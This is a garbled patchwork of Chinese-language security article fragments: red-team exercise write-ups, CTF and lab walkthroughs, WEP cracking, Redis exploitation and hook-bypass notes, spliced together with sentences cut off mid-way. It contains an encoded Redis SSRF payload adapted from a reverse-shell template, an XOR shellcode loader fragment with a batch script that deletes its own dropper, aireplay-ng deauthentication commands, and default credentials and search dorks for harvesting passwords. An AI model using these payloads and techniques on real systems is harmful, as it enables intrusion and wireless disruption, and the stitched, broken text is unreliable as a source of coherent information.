大家好,我们是红日安全-Web安全攻防小组。 4. *1 $4 save *1 $4 quit payload由joychou的反弹shell修改而来,主要就是替换了写入文件的位置和文件内容。 0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d% set $10 dbfilename $4 root *1 $4 save *1 $4 quit 来自:https://joychou.org/web/phpssrf.html 其中$61为我的vps
,先下载下来吧 2.下载下来先查壳 下载下来是个64位没加壳的二进制文件 3.老规矩,先丢进kali运行一下看看程序流程 运行了一下发现程序流程就是让用户输入猜测的,一句猜测的结果进行输出提示 4.
凭据访问 3.1 不安全的凭据:文件中的凭据 进行信息收集,发现/home/jim/backups/old-passwords.bak有252个老密码 同时统中有4个用户可以登录,sync不算 把这些帐号密码做成字典 聊天消息 用户目录下有mbox文件,mbox是一种以纯文本形式存储邮件内容的格式,这说明了用户有使用邮件客户端 使用/usr/bin/mail命令,可以查看用户的邮件消息,最终获得Charles的帐号密码 4.
信息安全的关键因素是人,有人的地方就有江湖,江湖中避免不了攻防博弈,而博弈是攻防双方采用越来越新的技术进行较量的过程。对于国家、企事业单位甚至个人而言,守护安全防线,确保数据不遗失是最终目的。 而且,攻防演练活动自兴起以来,越来越常态化。但是,每年的这个时刻,都是攻防双方激烈博弈、尤为紧张的时刻。 ,可谓是神经紧绷、夜晚失眠、饭菜不香,真希望攻防演练的活动抓紧结束,避免自身丢分,被吊打的很惨。 图片众所周知,在攻防中为了牢固防线安全运营团队会部署安全防护工具、制定安全解决方案对防线进行实施保护。 而且,RASP技术集合BAS技术可以在攻防演练活动中实现自动化检测,对安全威胁进行验证,确保安全链路完整。正因此,RASP技术可以更好的在攻防演练中发挥作用,确保防线安全,避免防守方丢分。
retrieve files 1:点开网站,随便选择一个页面 2:开启抓包,点击“Check stock”,并把包发送到重放模块,停止抓包 3:根据实验室首页提到的方法,开始解题 4: perform SSRF attacks 1:随意打开一个页面 2:开启抓包,点击“Check stock”,并把包发送到重放模块,停止抓包 3:根据实验室首页提到的方法,开始解题 4: 反复测试之后,把提示中第4步说到的路径,略作处理即可 <! 所以需要设定一下读取文件位置 作者读对flag做了二次处理,上面的flag是一个经过base32编码的 1:base32解码 2:base64解码 3:拿到了一个路径,看样子还得继续任意文件读取 4: 参考 [红日安全]Web安全Day8 – XXE实战攻防 浅谈XXE攻击 XXE漏洞利用技巧:从XML到远程代码执行 未知攻焉知防——XXE漏洞攻防 XXE从入门到放弃 浅谈XXE漏洞攻击与防御
利用Redis主从复制REC 在Reids4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的
RTL-SDR、USRP、HackRF、及BladeRF等外设的价格下降,软件环境社区的完善,使现在对无线网络的研究已经不再像以前只能利用2.4GHz的无线网卡进行狭义的“无线”攻防。 二、无线网络的加密方式和破解方式 1、WEP加密及破解 1)、WEP加密方式 有线等效保密(wired euivalent pricacy,WEP)协议的使用RC4(rivest cipher4)串流加密技术保障机密性 (4)无线终端给目标AP发送AUTH包。AUTH认证类型有两种︰0为开放式,1为共享式(WPA/WPA2必须是开放式)。 (5) AP回应网卡AUTH包。 此处需要新开启一个shell: aireplay-ng -0 1 -a F4:6A:92:90:23:XX -c A4:02:B9:CC:6D:XX wlan0mon -0 采用deauth攻击模式, 6A:92:90:23:6D wlan0mon -0 攻击五次 -a 路由器mac 或者: aireplay -0 0 -a F4:6A:92:90:23:6D -c A4:02:B9:CC:6D:
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦在某头部直辖市的攻防演练中,各家安全厂商投入了大量人力物力...而我方基本未做准备,只有小米加步枪, 且看如何不用0day如何连下数城前言几个月前打了一场某头部直辖市的攻防演练,演练当时通知的很急促,没做什么准备直接小米加步枪上阵了...在此过程中,很多个没用到0day的打点案例都很有意思,下面就简单分享一下案例一 RCE的话,历史上主要有“默认X-API-Key”和“Dashboard未授权访问”两个洞可以用过往挖某SRC的时候,就遇到过默认X-API-Key导致可直接创建执行lua代码的恶意路由的问题恰巧这次攻防演练中 Gitlab项目权限误配导致公有云接管防守单位中某单位的Gitlab开放到了公网,但是爆破了一顿,并不存在弱口令和其他Nday漏洞但是经过对Gitlab的测试,找到了Gitlab中仓库权限的配置问题/api/v4/ ,拥有充足的经验,而又不陷入经验主义的迂腐,面对万难,而又不放弃思考,是出奇制胜的关键所在原文经过过文作者授权转载原文作者:奇安信攻防社区(J0o1ey)原文地址:https://forum.butian.net
文章首发于:奇安信攻防社区 https://forum.butian.net/share/1633 背景 记一次EDU攻防,来之前还是有点怂的,因为前段时间刚打了其它地方EDU感受了一波,小部分目标有重合好难打啊 总结 这次攻防整体的反思,外网打点信息收集尽量宽泛仔细一些,在现场打压力还是大的打不出来东西就是在坐牢,和队伍里师傅第一次协作不是很好没有沟通好打哪个目标好点,师傅第一次打也很懵逼,我打的多之前都是旁边辅助混子哈哈哈
时间 时间在22年护网结束之后,8月中旬左右,当时公司接了一个市级的攻防演练,作为实习生的我,有幸和师傅一起参加,也是我第一次以红队身份参加,当然,更多的还是蹭师傅的光 拿了第一有个感谢信(O(∩_∩ 端口开放: 成果五:某公司MongoDB未授权漏洞(空口令) 这个比较容易,fofa搜了下发现27017端口,遂尝试 成果六:某公司OA注入+任意文件上传 首先是某OA的注入获取shell 攻防开始前已经被上传马了 结尾 我也是第一次参加,虽然每边分到90多个url,但是一半多都是门户网站,一开始说内网可以打,过了一天又不让打了,当时因为cs的版本上线还有点问题纠结好久,然后星期五开始写报告就结束了这次攻防演练
现在我依稀记得大家在9月25日晚集体过年的场景,没想到的是:那tm只是开始 这一段时间一直在打攻防,重复、单调、无长进,希望早日脱离苦海吧 下面以攻防过程中的一段经历来展现一些有意思的tips ---- = ""; for (int i = 0; i < sizeof(buf) - 1; i++) { shellcode[i] = (buf[i] ^ key) - 0x4; 删除自解压程序 del /f /a /q %b% rem 删除马 del /f /a /q %0% rem 删除bat自身 0x05 内网渗透 我对于攻防比赛中的内网渗透是及其反感的
文章首发于:奇安信攻防社区 https://forum.butian.net/share/1780 对前阵子的攻防演练比赛进行总结,分享一些个人的思路和方法 0x01 外网打点 资产发现 多测绘平台搜索 #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里 123 test root 对于一些应用广泛的系统,可以通过google语法搜索其默认密码 这里通过sysadmin/1 成功登入泛微后台 nacos/nacos 常见漏洞利用 对于多目标的攻防演练 Anonymous-ghost/AttackWebFrameworkTools-5.0 https://github.com/d3ckx1/Fvuln https://github.com/W01fh4cker 但是无利用链 可能有些人看到这里就放弃了,但这可能会错过一个利用点 shiro可以无依赖链利用,感觉有戏尝试一波,相关知识可拜读师傅的文章https://www.le1a.com/posts/a5f4a9e3
云原生攻防矩阵: 云原生环境攻击路径的全景视图,清晰每一步采取的攻击技术。 目前,多个云厂商和安全厂商都已经梳理了多个针对容器安全的威胁矩阵,我们可以参考这些成熟的模型,结合个人对云原生安全的理解,构建自己的攻防矩阵。 然后通过不断的学习和实践,我们可以持续优化和补充这个攻防矩阵,从而有效提升对云原生环境的保护能力。 针对云原生环境的攻击技术,与传统的基于Windows和Linux的通用攻击技术有很大的不同,在这里,我们梳理了一个针对容器和K8s常见攻击技术的云原生攻防矩阵。 视频版:《云原生安全攻防》--云原生攻防矩阵
session的构造比较简单: 我们来看下线程最重要run中的内容: 内容不多,就是判断Socks4还是5并解析,之后是创建读写线程并start。 判断Socks4 还是 5: Socks代理至少三个字节的请求,第一个字节一定为5,如果是Socks4,则第一个字节一定为4。 parseSocks5和parseSocks4 为判断对应Socks的协议解析是否成功。 Reader: Writer: 读写部分是一些转发的常规操作。 实战攻防 在实战中使用可能会碰到一些特殊问题。 比如在浏览器中访问可以出现熟悉的"Georg says,'All seems fine'",说明可以正常访问。 这样我们才可以做到在这不断提升的攻防中稳步前行。
4、Protected Users Group 需要再研究研究,等电脑配置好了再说 23333。
攻防演练简介 国家级攻防演练从2016年开始,已经走过了6个年头,它是由公安部组织的,这个网络安全攻防演练集结了国家顶级的攻防力量,以不限制手段、路径,进行获取权限并攻陷指定靶机为目的实战攻防演练。 防守方的防守要点: 1、限制报告数量,注重上报准确度; 2、明确非正常防守扣分要求; 3、设置加分上限; 4、强化追踪溯源重要性; 5、重视云、大、物、域控等管控权限;强调同等重要系统重要性。 挖掘漏洞或利用已分配权限进入内网; 利用第三方运维、内部违规员工非常外联入群专网; 使用弱口令、密码复用、密码猜测攻击获取权限; 控制欲控、堡垒机、云平台、单点登录、杀毒软件后台等系统以点打面; 搜索多网卡主机、4A 2.2、反序列化漏洞 2.3、远程命令执行漏洞 2.4、任意文件上传漏洞 3、代码执行漏洞代表:struts2、spring 4、反序列化执行漏洞代表:shiro 小结 攻防演练过程中最关注的是权限和数据这两个点,基于对这两个点进行攻防。
python36 #yum -y install epel-release #添加源 #yum install -y python36-setuptools #安装python tools插件 4、 \install-service-winlogbeat.ps1 4.启动winlogbeat: .\winlogbeat.exe –e -c . 4.进行安装,执行命令: docker-compose up 启动后,就可以访问WatchAD-Web前端页面了,地址:http://服务器ip/activity_timeline.html 0x05 WatchAD攻防实战 本次简要攻击测试场景主要包括:ms17010攻击域控,利用psexec横向移动、添加域控管理员等,其他攻击场景后续进一步拓展。 附:WatchAD攻防实战演示视屏 参考资料: 1、 https://www.cnblogs.com/backlion/p/13023599.html 2、 https://zhuanlan.zhihu.com
虽然相比于修改函数地址更不易检测到,但是还是有技术手段能够进行修改函数代码的检测,本文就基于Inline hook来从防守方制定hook检测的策略和攻击方如何绕过hook检测两方面来浅谈hook技术的攻防 hook攻防 这里我选择使用MessageBoxA函数来进行hook的检测,因为MessageBoxA在hook之后能够比较清晰的看到结果 这里我首先使用win32资源文件来创建一个图形窗口,功能是点击开始就会弹窗 即为call,E9即为jmp 短跳转:机器码为2个字节E8 XX,E8是call的硬编码,XX是跳转范围-128~127 长跳转:机器码为5个字节E9 XX XX XX XX,E9是jmp的硬编码,剩下4个字节表示转移偏移量 我们知道如果要对E9进行监控肯定只会在MessageBoxA这块内存空间进行监控,那么我们就可以通过E8短跳到其他地址,再通过E9长跳到我们自己的函数 第二层 防 在第一层的hook攻防中,我们首先用常规方式被 hook,然后使用E8指令代替E9来实现了绕过hook的效果,作为蓝队人员也对检测机制进行了升级,在第二层hook攻防中,蓝方成员选择的是CRC/全代码校验。
获得权限: 入侵性攻击,利用收集的信息找到系统漏洞(软件、配置),利用漏洞获得一定权限 权限扩大: 利用远程漏洞,黑客能获得一定权限,通常是普通用户权限; 利用本地漏洞,或者通过“木马”,获得管理员权限 4、 它必须目录下不含其它任何文件或文件夹 通过Del 我们就可以将非空目录下的文件删除,让文件夹成为一个空目录 命令格式:del+路径+文件名(如果针对当前目录操作,可省略路径名,直接写上文件名) 3-14 3-21 3-28 4- 18 4-25 5-16 5-23 pgp加密 它还能对你的邮件加上数字签名从而使收信人可以确信邮件是你发来的。
一,stegano 分析题目:仔细观察水印No Flag Here! 说这里没有Flag,此地无银三百两,全选一下(ctrl+a)发现水印也可以被选中 将全选后的文档复制到记事本,发现出现一串BABA的格式,这样我们联想到了摩斯密码 B 换成 - A 换成 . 空格表示为 / -.-./---/-./--./.-./.--/..-/.-../.--/../---/-./.../--..--/..-./.-../.-/--./---.../.----/-./...-/.----/...../.-